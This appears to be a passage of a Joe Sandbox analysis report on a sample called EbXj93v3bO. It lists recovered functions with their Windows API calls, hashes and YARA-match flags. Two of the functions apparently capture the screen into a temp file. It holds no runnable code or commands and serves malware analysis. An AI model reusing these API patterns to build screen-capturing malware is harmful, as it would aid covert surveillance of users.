API String ID: 1272433827-0
Opcode ID: 47d67bb98ae687caab0f152daec36b922070e938420cb95d1256d2dc5184026a
Instruction ID: 538c22e4eb892f32bc8c86ea5e443232934619ae82977abc573478e901e73d8c
Opcode Fuzzy Hash: 47d67bb98ae687caab0f152daec36b922070e938420cb95d1256d2dc5184026a
Instruction Fuzzy Hash: D4F04F32A103009FE710EF69D906B9D77E1AF05726F10416AF910DB2E2CB7999808F49

Function 0254B4E9 Relevance: 1.5, APIs: 1, Instructions: 31COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 02542141: GetLastError.KERNEL32(?,?,0253A9EC,?,00000000,?,0253CDE6,0251247E,00000000,?,00451F20), ref: 02542145
Part of subcall function 02542141: _free.LIBCMT ref: 02542178
Part of subcall function 02542141: SetLastError.KERNEL32(00000000,00000000,?,00451F20), ref: 025421B9

EnumSystemLocalesW.KERNEL32(0043B1D9,00000001,?,?,?,0254BCAB,02540A1C,?,?,?,?,?,02540A1C,?,?,?), ref: 0254B520

Memory Dump Source

Source File: 00000000.00000002.4104248439.0000000002510000.00000040.00001000.00020000.00000000.sdmp, Offset: 02510000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2510000_EbXj93v3bO.jbxd

Yara matches

Similarity

API ID: ErrorLast$EnumLocalesSystem_free
String ID:
API String ID: 2016158738-0
Opcode ID: 17a3dc99c73c840853923c14692af3efa017a2bf6fb03d58d7281da58e8ea8e8
Instruction ID: f94af94b402663c4e5b4e7a57653ec514901afc1625fee59b033d8e401318faa
Opcode Fuzzy Hash: 17a3dc99c73c840853923c14692af3efa017a2bf6fb03d58d7281da58e8ea8e8
Instruction Fuzzy Hash: 22F0203A30020957CB089F36E80476ABF90EBC1758B0A0059EF098B290DA31D842C794

Function 0043B282 Relevance: 1.5, APIs: 1, Instructions: 31COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00431EDA: GetLastError.KERNEL32(?,?,0042DFE5,00457910,00000010), ref: 00431EDE
Part of subcall function 00431EDA: _free.LIBCMT ref: 00431F11
Part of subcall function 00431EDA: SetLastError.KERNEL32(00000000), ref: 00431F52

EnumSystemLocalesW.KERNEL32(0043B1D9,00000001,?,?,?,0043BA44,004307B5,?,?,?,?,?,004307B5,?,?,?), ref: 0043B2B9

Memory Dump Source

Source File: 00000000.00000002.4103720960.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_EbXj93v3bO.jbxd

Similarity

API ID: ErrorLast$EnumLocalesSystem_free
String ID:
API String ID: 2016158738-0
Opcode ID: d795fd725da8cf926aceeb2c3e7fa24b7794cc6b9bd948e6377232035fe4f002
Instruction ID: ec76e124c96d5fb6d75208995366108955e3ecd697e122142a5eb02f601840fd
Opcode Fuzzy Hash: d795fd725da8cf926aceeb2c3e7fa24b7794cc6b9bd948e6377232035fe4f002
Instruction Fuzzy Hash: C8F0553A30020897CB089F7BE81976BBF90EFC5754F0A409EEF098B290C3399942C794

Function 025208CD Relevance: 1.5, APIs: 1, Instructions: 3COMMON

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNEL32(00410672,0251FE60), ref: 025208D2

Memory Dump Source

Source File: 00000000.00000002.4104248439.0000000002510000.00000040.00001000.00020000.00000000.sdmp, Offset: 02510000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2510000_EbXj93v3bO.jbxd

Yara matches

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: b15aee9717d6502a1a2a20d9443c42d18a3a581c825a371cb40572de9e709067
Instruction ID: fa39807fe97804f53db995cd18131740e6dead46809b56a5c9e59eb8483b0dbe
Opcode Fuzzy Hash: b15aee9717d6502a1a2a20d9443c42d18a3a581c825a371cb40572de9e709067
Instruction Fuzzy Hash:

Function 00410666 Relevance: 1.5, APIs: 1, Instructions: 3COMMON

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNEL32(Function_00010672,0040FBF9), ref: 0041066B

Memory Dump Source

Source File: 00000000.00000002.4103720960.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_EbXj93v3bO.jbxd

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: b15aee9717d6502a1a2a20d9443c42d18a3a581c825a371cb40572de9e709067
Instruction ID: fa39807fe97804f53db995cd18131740e6dead46809b56a5c9e59eb8483b0dbe
Opcode Fuzzy Hash: b15aee9717d6502a1a2a20d9443c42d18a3a581c825a371cb40572de9e709067
Instruction Fuzzy Hash:

Function 0043BBC1 Relevance: 1.3, APIs: 1, Instructions: 5memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 0043BBC1

Memory Dump Source

Source File: 00000000.00000002.4103720960.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_EbXj93v3bO.jbxd

Similarity

API ID: HeapProcess
String ID:
API String ID: 54951025-0
Opcode ID: b4ea6d87a370488c09fcd641e95d7d939a449e6ed78a54530fece2258cf524d5
Instruction ID: 646215492ee1b006629ac518ce4a11708067c45d14fae9e363609ac2be79142b
Opcode Fuzzy Hash: b4ea6d87a370488c09fcd641e95d7d939a449e6ed78a54530fece2258cf524d5
Instruction Fuzzy Hash: 3FA02230A00300EF8380CF30AE0830E3BE8BE03AC3B008238A002C3030EB30C0808B08

Function 004373D9 Relevance: .6, Instructions: 637COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4103720960.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_EbXj93v3bO.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 833578221895711969fd992aca003b8dff0ac6b0b4e24d9bd8e499997b964946
Instruction ID: 2844b30024e45351147ede59872166b67bb7d3639a7d84f230d679a3a0c0a750
Opcode Fuzzy Hash: 833578221895711969fd992aca003b8dff0ac6b0b4e24d9bd8e499997b964946
Instruction Fuzzy Hash: 32325761D69F014DE733A634C822336A258AFBB3D4F15E737E85AB5EA5EB2CC4834105

Function 004071AB Relevance: .4, Instructions: 378COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4103720960.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_EbXj93v3bO.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2dcf4a0559928c98f2b5d77cb0860f560abd3a2571bac000fbe95f0a84bb6040
Instruction ID: d13affd36985adaba9549dda1076aa7943650852f65e7c6b0ce314185b1835a0
Opcode Fuzzy Hash: 2dcf4a0559928c98f2b5d77cb0860f560abd3a2571bac000fbe95f0a84bb6040
Instruction Fuzzy Hash: 88E18470A08612EFD714CF24C590AAAB7F1FF44304B54457EE846ABB81D738F862DB96

Function 025376EB Relevance: .4, Instructions: 356COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4104248439.0000000002510000.00000040.00001000.00020000.00000000.sdmp, Offset: 02510000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2510000_EbXj93v3bO.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b270ae943b8fc30b0109646306f9a638257ad0854cfcd7f7143e4a79d383dfca
Instruction ID: 8cbdc7f55a3e299039c238df233a366e092d2c17adadb90b0fa463db34e797f4
Opcode Fuzzy Hash: b270ae943b8fc30b0109646306f9a638257ad0854cfcd7f7143e4a79d383dfca
Instruction Fuzzy Hash: 27D1E7B36081A34ECB2F4A39847403AFFE27A461A530D579DE4F7CB5C2EE20D654D664

Function 02537FCE Relevance: .3, Instructions: 254COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4104248439.0000000002510000.00000040.00001000.00020000.00000000.sdmp, Offset: 02510000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2510000_EbXj93v3bO.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 93657a121f16255c59120ad0d08fdbba6372c273009ad596b4ecdf6e8f3c6909
Instruction ID: 24e530f4ff01e7925d11eab4903f83a725a57481f5b998505c8643d9d3235882
Opcode Fuzzy Hash: 93657a121f16255c59120ad0d08fdbba6372c273009ad596b4ecdf6e8f3c6909
Instruction Fuzzy Hash: 509144722090A34AEB6F463E847813EFFE17A412A531A279DF4F2CB1C5EF24D564D624

Function 00427D67 Relevance: .3, Instructions: 254COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4103720960.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_EbXj93v3bO.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 93657a121f16255c59120ad0d08fdbba6372c273009ad596b4ecdf6e8f3c6909
Instruction ID: b25d7b7a8e55bbee32d2fc67e28ff16be1cfeba2f71328b5531bdb6c5bdb1bbb
Opcode Fuzzy Hash: 93657a121f16255c59120ad0d08fdbba6372c273009ad596b4ecdf6e8f3c6909
Instruction Fuzzy Hash: 6491647230D0B34ADB294679953443FFFE15E523A135A07DFE4F2CA2C1EE289964D624

Function 02538289 Relevance: .2, Instructions: 244COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4104248439.0000000002510000.00000040.00001000.00020000.00000000.sdmp, Offset: 02510000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2510000_EbXj93v3bO.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 05e0b846b00456d0f1e87463b9d189974beed2fe63262d4392584e128a114ea2
Instruction ID: 51e82d503e6be30c04ac12dcc8410af65a25417b9117f5937b9eec81a8352589
Opcode Fuzzy Hash: 05e0b846b00456d0f1e87463b9d189974beed2fe63262d4392584e128a114ea2
Instruction Fuzzy Hash: EB9161721080A34AEB6F467A893C13EFFE16A421B530A279DF4F2CB5C5EF24D564D624

Function 00428022 Relevance: .2, Instructions: 244COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4103720960.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_EbXj93v3bO.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 05e0b846b00456d0f1e87463b9d189974beed2fe63262d4392584e128a114ea2
Instruction ID: 19c93412fb5f9130a8e3bb0cb99d698500333008097130ff6794007c36a41420
Opcode Fuzzy Hash: 05e0b846b00456d0f1e87463b9d189974beed2fe63262d4392584e128a114ea2
Instruction Fuzzy Hash: 6591943230A0B34EEB294279943403FFFE15A523A135A07DFD4F2CA2C5EE189565E628

Function 02537D07 Relevance: .2, Instructions: 240COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4104248439.0000000002510000.00000040.00001000.00020000.00000000.sdmp, Offset: 02510000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2510000_EbXj93v3bO.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 40101273f58913c3cb3bc7eb54df01d47b4121c3e67d19f11ec2cb23d33ea445
Instruction ID: 1dd60d3030ece5560e73600e4143baf4478662be003f99398fd6fb9de3bf8ae8
Opcode Fuzzy Hash: 40101273f58913c3cb3bc7eb54df01d47b4121c3e67d19f11ec2cb23d33ea445
Instruction Fuzzy Hash: 189186B29090E34ADB2B463D853413DFFE1BA451A170A1B9DD4F2CF1C5EF14C564D624

Function 00427AA0 Relevance: .2, Instructions: 240COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4103720960.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_EbXj93v3bO.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 40101273f58913c3cb3bc7eb54df01d47b4121c3e67d19f11ec2cb23d33ea445
Instruction ID: d2c87871af4d92e544e05363471dd483cf2102058027b34f35735ca62f395a82
Opcode Fuzzy Hash: 40101273f58913c3cb3bc7eb54df01d47b4121c3e67d19f11ec2cb23d33ea445
Instruction Fuzzy Hash: 0691937230D0B34ADB2D467AA47403EFFE15A523B139A079FD4F2CB2C1ED18D6659628

Function 0253D755 Relevance: .2, Instructions: 237COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4104248439.0000000002510000.00000040.00001000.00020000.00000000.sdmp, Offset: 02510000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2510000_EbXj93v3bO.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f064d261a6db162a18988518e6412387d7217a2fbe5ef33d199751ee8f38446f
Instruction ID: aa8b9c2f03d337fd8f1cee32163f8df0c6e71ee03c49fde63b0279ea037958cd
Opcode Fuzzy Hash: f064d261a6db162a18988518e6412387d7217a2fbe5ef33d199751ee8f38446f
Instruction Fuzzy Hash: B6614B7260270956DB3B697C88907BEEBB5BF81B18F043819E842DB2C1D715B942C75D

Function 0042D4EE Relevance: .2, Instructions: 237COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4103720960.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_EbXj93v3bO.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4bd5393d4189e9aa91ad74f9bcbb8c764c0ecaf8bff73b58941f35d4311e138b
Instruction ID: 543360d7dfb9058b4a8e0476cf2bcab449255d23345d35b398e8df16a867321f
Opcode Fuzzy Hash: 4bd5393d4189e9aa91ad74f9bcbb8c764c0ecaf8bff73b58941f35d4311e138b
Instruction Fuzzy Hash: 856154B1F0073876DA385A2CB892BBF63849F41748FE4041BE447DB381D69DDD82865E

Function 02537A5D Relevance: .2, Instructions: 232COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4104248439.0000000002510000.00000040.00001000.00020000.00000000.sdmp, Offset: 02510000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2510000_EbXj93v3bO.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 70da388f96bbbf26b230a155b4728740b34f0d100ea60ab2bbadb9d7d0befbf0
Instruction ID: 98017425a85dc38fb4b70205b578343f23cd9dd9f8c9dcc9f5d2f94f721893b3
Opcode Fuzzy Hash: 70da388f96bbbf26b230a155b4728740b34f0d100ea60ab2bbadb9d7d0befbf0
Instruction Fuzzy Hash: FC8194B2A080E74AEB6B463E847417EFFF16A461A530A179ED4F2CB1C1FF14C264D624

Function 004277F6 Relevance: .2, Instructions: 232COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4103720960.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_EbXj93v3bO.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 70da388f96bbbf26b230a155b4728740b34f0d100ea60ab2bbadb9d7d0befbf0
Instruction ID: 3d3f4059477c25f3e34474a921d34c240437fa272c48f742cc2d27251d9ebad1
Opcode Fuzzy Hash: 70da388f96bbbf26b230a155b4728740b34f0d100ea60ab2bbadb9d7d0befbf0
Instruction Fuzzy Hash: E481737230D0B34AEB294679943843FFFE15A523A135A079FD4F2CA2C1EE188A64D624

Function 025387C7 Relevance: .1, Instructions: 76COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4104248439.0000000002510000.00000040.00001000.00020000.00000000.sdmp, Offset: 02510000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2510000_EbXj93v3bO.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
Instruction ID: 2da2f34e3b62f6a7e24f12147e57acc546da7d91956da58fcdf1b72e437f7a0b
Opcode Fuzzy Hash: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
Instruction Fuzzy Hash: 5D11C87720004247D65F863ED4BC6BAEB96FAC523872D7E7AF1414B658D322E145D608

Function 00428560 Relevance: .1, Instructions: 76COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4103720960.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_EbXj93v3bO.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
Instruction ID: e183cc42c0575e46eff71331dfd644b760227977963c57612164f9205c38e507
Opcode Fuzzy Hash: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
Instruction Fuzzy Hash: 631138773030B1A3D604862DF8B46BFA395EBE63217EC426FC0424B748CE6AE9C1950C

Function 00B3E513 Relevance: .1, Instructions: 61COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4104016383.0000000000B3E000.00000040.00000020.00020000.00000000.sdmp, Offset: 00B3E000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b3e000_EbXj93v3bO.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
Instruction ID: 924b08fdc86cc4f5fa4c32762706a8fc5b3923bad5ac3e13c7721d383cdb7576
Opcode Fuzzy Hash: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
Instruction Fuzzy Hash: 51117C72340100AFD754DE55DCC1FA673EAEB9D324B2A80A6ED14CB352E675EC01C760

Function 02510D90 Relevance: .0, Instructions: 43COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4104248439.0000000002510000.00000040.00001000.00020000.00000000.sdmp, Offset: 02510000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2510000_EbXj93v3bO.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4464db465ba34ef3b506432a1509cd0f617e3f47c711957a903ed9c1c8e80aab
Instruction ID: b3c184ed2e8a522ffd07c2cbe8b45a2e8dd24b4d0c5f88437f8dd703f42f5b8b
Opcode Fuzzy Hash: 4464db465ba34ef3b506432a1509cd0f617e3f47c711957a903ed9c1c8e80aab
Instruction Fuzzy Hash: 4601F276B106008FEF21CF20C804BAB33E5FB86206F0541A4DD0A972C5E374A8818B84

Function 004020FA Relevance: 49.2, APIs: 27, Strings: 1, Instructions: 205COMMON

Download Yara Rule

APIs

DefWindowProcW.USER32(?,00000014,?,?), ref: 00402135
GetClientRect.USER32(?,?), ref: 0040214A
GetDC.USER32(?), ref: 00402151
CreateSolidBrush.GDI32(00646464), ref: 00402164
SelectObject.GDI32(00000000,00000000), ref: 00402178
CreatePen.GDI32(00000001,00000001,00FFFFFF), ref: 00402183
SelectObject.GDI32(00000000,00000000), ref: 00402191
Rectangle.GDI32(00000000,00000000,00000000,?,?), ref: 004021A4
GetDeviceCaps.GDI32(00000000,0000005A), ref: 004021AF
MulDiv.KERNEL32(00000008,00000000), ref: 004021B8
CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000190,00000000,00000000,00000000,00000000,00000000,00000000,00000002,00000031,Tahoma), ref: 004021DC
SelectObject.GDI32(00000000,00000000), ref: 004021EA
SetBkMode.GDI32(?,00000001), ref: 00402267
SetTextColor.GDI32(?,00000000), ref: 00402276
_wcslen.LIBCMT ref: 0040227F

Strings

Tahoma, xrefs: 004021BE

Memory Dump Source

Source File: 00000000.00000002.4103720960.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_EbXj93v3bO.jbxd

Similarity

API ID: CreateObjectSelect$BrushCapsClientColorDeviceFontModeProcRectRectangleSolidTextWindow_wcslen
String ID: Tahoma
API String ID: 3832963559-3580928618
Opcode ID: 06f3b736a1676dd81313cb3cb312b67037eb7e675966450ccfe924ee66f5f664
Instruction ID: 7336700d8ad07cb9e45a564d019af9580db2992b46b3f32d80e0fb6f80206702
Opcode Fuzzy Hash: 06f3b736a1676dd81313cb3cb312b67037eb7e675966450ccfe924ee66f5f664
Instruction Fuzzy Hash: F3710D72900228AFDB22DF64DD85FAEBBBCEF09751F0041A5B609E6155DA74AF80CF14

Function 00402571 Relevance: 38.7, APIs: 21, Strings: 1, Instructions: 186windowkeyboardfileCOMMON

Download Yara Rule

APIs

DestroyWindow.USER32(?), ref: 004025CD
DefWindowProcW.USER32(?,00000204,?,?), ref: 004025DF
ReleaseCapture.USER32 ref: 004025F2
GetDC.USER32(00000000), ref: 00402619
CreateCompatibleBitmap.GDI32(?,-0045D5E7,00000001), ref: 004026A0
CreateCompatibleDC.GDI32(?), ref: 004026A9
SelectObject.GDI32(00000000,00000000), ref: 004026B3
BitBlt.GDI32(00000000,00000000,00000000,?,?,?,00CC0020), ref: 004026E1
ShowWindow.USER32(?,00000000), ref: 004026EA
GetTempPathW.KERNEL32(00000104,?), ref: 004026FC
GetTempFileNameW.KERNEL32(?,gya,00000000,?), ref: 00402717
DeleteFileW.KERNEL32(?), ref: 00402731
DeleteDC.GDI32(00000000), ref: 00402738
DeleteObject.GDI32(00000000), ref: 0040273F
ReleaseDC.USER32(00000000,?), ref: 0040274D
DestroyWindow.USER32(?), ref: 00402754
SetCapture.USER32(?), ref: 004027A1
GetDC.USER32(00000000), ref: 004027D5
ReleaseDC.USER32(00000000,00000000), ref: 004027EB
GetKeyState.USER32(0000001B), ref: 004027F8
DestroyWindow.USER32(?), ref: 0040280D

Strings

gya, xrefs: 0040270B

Memory Dump Source

Source File: 00000000.00000002.4103720960.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_EbXj93v3bO.jbxd

Similarity

API ID: Window$DeleteDestroyRelease$CaptureCompatibleCreateFileObjectTemp$BitmapNamePathProcSelectShowState
String ID: gya
API String ID: 2545303185-1989253062
Opcode ID: 3cc899ee20bb76856f28d22ad06e46436276cc9c649a89ba50e82cf41c873628
Instruction ID: a73b2935a0a3d6b8847c17f141a4fcfbdcbb362899817371daa4de44eaa4c7d1
Opcode Fuzzy Hash: 3cc899ee20bb76856f28d22ad06e46436276cc9c649a89ba50e82cf41c873628
Instruction Fuzzy Hash: 1761A4B5900219AFCB249F64DD48BAA7BB9FF49706F004179F605A62A2D7B4C941CF1C

Function 0253E919 Relevance: 22.8, APIs: 15, Instructions: 296COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 0253E989
_free.LIBCMT ref: 0253E99F
_free.LIBCMT ref: 0253E9B0
_free.LIBCMT ref: 0253E9C1
_free.LIBCMT ref: 0253E9D8
GetCPInfo.KERNEL32(?,?), ref: 0253EA20

Part of subcall function 02546952: _free.LIBCMT ref: 025469BD

_free.LIBCMT ref: 0253EBCC
_free.LIBCMT ref: 0253EBDF
_free.LIBCMT ref: 0253EBED
_free.LIBCMT ref: 0253EBF8
_free.LIBCMT ref: 0253EC3A
_free.LIBCMT ref: 0253EC42
_free.LIBCMT ref: 0253EC4A
_free.LIBCMT ref: 0253EC52
_free.LIBCMT ref: 0253EC60

Memory Dump Source

Source File: 00000000.00000002.4104248439.0000000002510000.00000040.00001000.00020000.00000000.sdmp, Offset: 02510000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2510000_EbXj93v3bO.jbxd

Yara matches

Similarity

API ID: _free$Info
String ID:
API String ID: 2509303402-0
Opcode ID: 17cc7d2981949aec261f5402442bc47708264f4dc272fa138ea10e652b727814
Instruction ID: 2961dfc0d4f3b621bf210d801c1fcbf62e31f99349aad6452e2585473ff3b0fe
Opcode Fuzzy Hash: 17cc7d2981949aec261f5402442bc47708264f4dc272fa138ea10e652b727814
Instruction Fuzzy Hash: 5BB19D7190030AAFDB22DFA8C881BEEBBF5BF49304F14456DE499A7251DB759841CF28

Function 0042E6B2 Relevance: 22.8, APIs: 15, Instructions: 296COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 0042E722
_free.LIBCMT ref: 0042E738
_free.LIBCMT ref: 0042E749
_free.LIBCMT ref: 0042E75A
_free.LIBCMT ref: 0042E771
GetCPInfo.KERNEL32(?,?), ref: 0042E7B9

Part of subcall function 004366EB: _free.LIBCMT ref: 00436756

_free.LIBCMT ref: 0042E965
_free.LIBCMT ref: 0042E978
_free.LIBCMT ref: 0042E986
_free.LIBCMT ref: 0042E991
_free.LIBCMT ref: 0042E9D3
_free.LIBCMT ref: 0042E9DB
_free.LIBCMT ref: 0042E9E3
_free.LIBCMT ref: 0042E9EB
_free.LIBCMT ref: 0042E9F9

Memory Dump Source

Source File: 00000000.00000002.4103720960.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_EbXj93v3bO.jbxd

Similarity

API ID: _free$Info
String ID:
API String ID: 2509303402-0
Opcode ID: fcc1ee792fcce2b96d93b5348cd25e2762bf37b8f9e02b10d348c09b50046bbd
Instruction ID: 2b0db881b533507aa5a5d3a35fa702b665ff2bbaed3809dcc6a19b45feaeb0d0
Opcode Fuzzy Hash: fcc1ee792fcce2b96d93b5348cd25e2762bf37b8f9e02b10d348c09b50046bbd
Instruction Fuzzy Hash: C1B1DFB1A002159FEB11DF6AD881BEEBBF5FF08304F54446FE485A7342D779A9418B24

Function 0254A85F Relevance: 19.6, APIs: 13, Instructions: 114COMMONLIBRARYCODE

Download Yara Rule

APIs

___free_lconv_mon.LIBCMT ref: 0254A8A3

Part of subcall function 02549BF2: _free.LIBCMT ref: 02549C0F
Part of subcall function 02549BF2: _free.LIBCMT ref: 02549C21
Part of subcall function 02549BF2: _free.LIBCMT ref: 02549C33
Part of subcall function 02549BF2: _free.LIBCMT ref: 02549C45
Part of subcall function 02549BF2: _free.LIBCMT ref: 02549C57
Part of subcall function 02549BF2: _free.LIBCMT ref: 02549C69
Part of subcall function 02549BF2: _free.LIBCMT ref: 02549C7B
Part of subcall function 02549BF2: _free.LIBCMT ref: 02549C8D
Part of subcall function 02549BF2: _free.LIBCMT ref: 02549C9F
Part of subcall function 02549BF2: _free.LIBCMT ref: 02549CB1
Part of subcall function 02549BF2: _free.LIBCMT ref: 02549CC3
Part of subcall function 02549BF2: _free.LIBCMT ref: 02549CD5
Part of subcall function 02549BF2: _free.LIBCMT ref: 02549CE7

_free.LIBCMT ref: 0254A898

Part of subcall function 025436D1: HeapFree.KERNEL32(00000000,00000000,?,0254A35F,?,00000000,?,00000000,?,0254A603,?,00000007,?,?,0254A9F7,?), ref: 025436E7
Part of subcall function 025436D1: GetLastError.KERNEL32(?,?,0254A35F,?,00000000,?,00000000,?,0254A603,?,00000007,?,?,0254A9F7,?,?), ref: 025436F9

_free.LIBCMT ref: 0254A8BA
_free.LIBCMT ref: 0254A8CF
_free.LIBCMT ref: 0254A8DA
_free.LIBCMT ref: 0254A8FC
_free.LIBCMT ref: 0254A90F
_free.LIBCMT ref: 0254A91D
_free.LIBCMT ref: 0254A928
_free.LIBCMT ref: 0254A960
_free.LIBCMT ref: 0254A967
_free.LIBCMT ref: 0254A984
_free.LIBCMT ref: 0254A99C

Memory Dump Source

Source File: 00000000.00000002.4104248439.0000000002510000.00000040.00001000.00020000.00000000.sdmp, Offset: 02510000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2510000_EbXj93v3bO.jbxd

Yara matches

Similarity

API ID: _free$ErrorFreeHeapLast___free_lconv_mon
String ID:
API String ID: 161543041-0
Opcode ID: 06440b44c22d454fcfdb7eecae663acef5c85cbb4bcd3e1a14e5022e47855d68
Instruction ID: 4759fa5783ce50fcf7dc516a55b64a61342b9cead801f5566759ba3d203ae8e2
Opcode Fuzzy Hash: 06440b44c22d454fcfdb7eecae663acef5c85cbb4bcd3e1a14e5022e47855d68
Instruction Fuzzy Hash: 43317E31640206AFEBA0AB38D844B5AFBE9FF40368F25446AE459D7660DF71A850CF5C

Function 0043A5F8 Relevance: 19.6, APIs: 13, Instructions: 114COMMONLIBRARYCODE

Download Yara Rule

APIs

___free_lconv_mon.LIBCMT ref: 0043A63C

Part of subcall function 0043998B: _free.LIBCMT ref: 004399A8
Part of subcall function 0043998B: _free.LIBCMT ref: 004399BA
Part of subcall function 0043998B: _free.LIBCMT ref: 004399CC
Part of subcall function 0043998B: _free.LIBCMT ref: 004399DE
Part of subcall function 0043998B: _free.LIBCMT ref: 004399F0
Part of subcall function 0043998B: _free.LIBCMT ref: 00439A02
Part of subcall function 0043998B: _free.LIBCMT ref: 00439A14
Part of subcall function 0043998B: _free.LIBCMT ref: 00439A26
Part of subcall function 0043998B: _free.LIBCMT ref: 00439A38
Part of subcall function 0043998B: _free.LIBCMT ref: 00439A4A
Part of subcall function 0043998B: _free.LIBCMT ref: 00439A5C
